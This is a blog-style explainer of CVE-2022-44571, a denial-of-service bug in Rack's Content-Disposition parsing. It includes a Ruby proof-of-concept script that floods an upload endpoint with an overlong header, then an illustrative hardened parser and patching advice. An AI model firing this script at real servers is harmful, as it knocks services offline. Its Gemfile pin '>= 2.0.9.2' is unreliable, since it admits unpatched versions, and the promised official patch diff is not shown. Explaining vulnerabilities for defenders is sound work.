CVE-2022-44571 - Denial of Service Vulnerability in Rack’s Content-Disposition Parsing (Explained)

Summary:
CVE-2022-44571 is a security issue discovered in the Content-Disposition header parser in Rack, a key webserver interface library used by almost every Ruby on Rails application. This flaw, fixed in Rack versions 2.0.9.2, 2.1.4.2, 2.2.4.1, and 3.0.0.1, could let attackers craft malicious inputs that slow down servers drastically, making it possible for them to cause a Denial of Service (DoS).

What is Rack?

Rack acts as the connection between web servers and Ruby web apps, most notably those built on Rails, Sinatra, and other Ruby frameworks. When you upload a file or submit a multipart/form-data form, Rack handles parsing the HTTP headers, including Content-Disposition.

Denial of Service via Malicious Multipart Data

When a user uploads a file, the browser adds a Content-Disposition header to describe the form field. Rack parses this to know what the field and filename are. However, a bug in how Rack parsed this header could allow an attacker to create a specially crafted multipart upload that takes *far too long* to parse, tying up your server’s CPU/RAM.

In practical terms, by sending multiple or very slow multipart posts, an attacker could render your entire Rails application non-responsive — a classic DoS scenario.

Example of a Content-Disposition header

Content-Disposition: form-data; name="profile_pic"; filename="cat.png"

But what if you send a header with thousands of nested or malformed parameters? That’s where the vulnerability appeared.

If you run Rack 3.0.0 before 3.0.0.1 (or one of the 2.x series before the patched releases listed above), you’re impacted! This means almost *every* Rails app before late 2022 needs to update or risk being vulnerable.

Let’s break down a conceptual attack.

Step 1: Craft a multipart/form-data POST request, but instead of a normal header, use a very large or recursive Content-Disposition header value, possibly with thousands of quote pairs or semi-invalid escape sequences.

Step 2: Send this payload to an endpoint that handles file or form uploads (any Rails controller accepting POST with files).

Step 3: Rack will try to parse it — but due to the bug, the parsing will take *forever*, tying up the Ruby process.

If done in bulk, your server CPUs max out and your application stalls (DoS).

Practical Code Snippet

You can emulate the attack with a simple Ruby script and Net::HTTP:

require 'net/http'

# Craft a maliciously long Content-Disposition value
malicious_value = 'form-data; name="data"; filename="' + ('a' * 100_000) + '"'

# Target a local development server (Rails listens on port 3000 by default)
uri = URI('http://localhost:3000/upload')
req = Net::HTTP::Post.new(uri)
req['Content-Type'] = 'multipart/form-data; boundary=boundary123'
req.body = <<~BODY
  --boundary123\r
  Content-Disposition: #{malicious_value}\r
  \r
  TestFileContent\r
  --boundary123--\r
BODY

res = Net::HTTP.start(uri.hostname, uri.port) { |http| http.request(req) }
puts "Got response: #{res.code}"

*Note: Don't run this against public servers unless you have permission—it can take servers offline!*

How Was It Fixed?

The fix tightened Rack’s parsing algorithm for the Content-Disposition header. The patched versions add guards to limit input complexity, avoid inefficient parsing, and gracefully reject overlong headers.

Here is the official patch diff for Rack.
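As an added illustration (not Rack's own code or the patch itself), here is a bounded, single-pass parser for a Content-Disposition value showing the kind of guards described above: it caps the input length before doing any work and walks the string once, so cost stays linear even for the thousands-of-quotes inputs mentioned earlier. The 1024-byte limit and the error class name are assumptions.

```ruby
# Added example, not Rack's implementation. MAX_LEN is a constructed limit.
MAX_LEN = 1024

class ContentDispositionError < StandardError; end

# Parses 'form-data; name="x"; filename="y.png"' into
# { type: "form-data", params: { "name" => "x", "filename" => "y.png" } }.
# Rejects overlong input up front and never backtracks, so parsing cost is
# linear in the header length regardless of how many quotes or escapes it has.
def parse_content_disposition(value, max_len: MAX_LEN)
  raise ContentDispositionError, "header too long (#{value.bytesize} bytes)" if value.bytesize > max_len

  segments = split_outside_quotes(value, ';')
  type = segments.shift.to_s.strip.downcase
  raise ContentDispositionError, "missing disposition type" if type.empty?

  params = {}
  segments.each do |seg|
    seg = seg.strip
    next if seg.empty?                       # tolerate a trailing ';'
    name, eq, raw = seg.partition('=')
    raise ContentDispositionError, "malformed parameter: #{seg}" if eq.empty? || name.strip.empty?
    params[name.strip.downcase] = unquote(raw.strip)
  end
  { type: type, params: params }
end

# Splits on sep only when outside a double-quoted string, honouring
# backslash escapes, in one left-to-right pass.
def split_outside_quotes(str, sep)
  parts = [+'']
  in_quotes = false
  escaped = false
  str.each_char do |c|
    if escaped
      parts.last << c
      escaped = false
    elsif c == '\\' && in_quotes
      parts.last << c
      escaped = true
    elsif c == '"'
      in_quotes = !in_quotes
      parts.last << c
    elsif c == sep && !in_quotes
      parts << +''
    else
      parts.last << c
    end
  end
  raise ContentDispositionError, "unterminated quoted string" if in_quotes
  parts
end

# Strips surrounding quotes and resolves backslash escapes (quotes are
# already known to be balanced by split_outside_quotes).
def unquote(raw)
  return raw unless raw.start_with?('"')
  raise ContentDispositionError, "malformed quoted value" unless raw.length >= 2 && raw.end_with?('"')
  raw[1..-2].gsub(/\\(.)/, '\1')
end
```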

How to Protect Your Rails & Ruby Applications

1. Update Rack Immediately

In your Gemfile, make sure you specify one of the patched versions

gem 'rack', '>= 2.0.9.2'

Then run

bundle update rack

2. Deploy
Push your changes to production as soon as possible.

3. Add WAF or Rate Limiting
To reduce the risk of future similar issues, use a Web Application Firewall or rate-limiting middleware to block abnormally heavy multipart/form-data uploads.

Original References

- Rack Security Advisory CVE-2022-44571
- NVD Database Entry
- Mitre CVE Record
- Rails Discussion

Closing Thoughts

CVE-2022-44571 is a classic case where even highly trusted infrastructure like Rack can have bugs with wide impact — every Rails app is at risk without the patch. Always keep dependencies up-to-date, and watch for security advisories from your stack.

By taking this flaw seriously and patching quickly, you defend your web apps against an easy path to downtime — keeping your Ruby services reliable and secure.

Timeline

Published on: 02/09/2023 20:15:00 UTC
Last modified on: 02/17/2023 18:51:00 UTC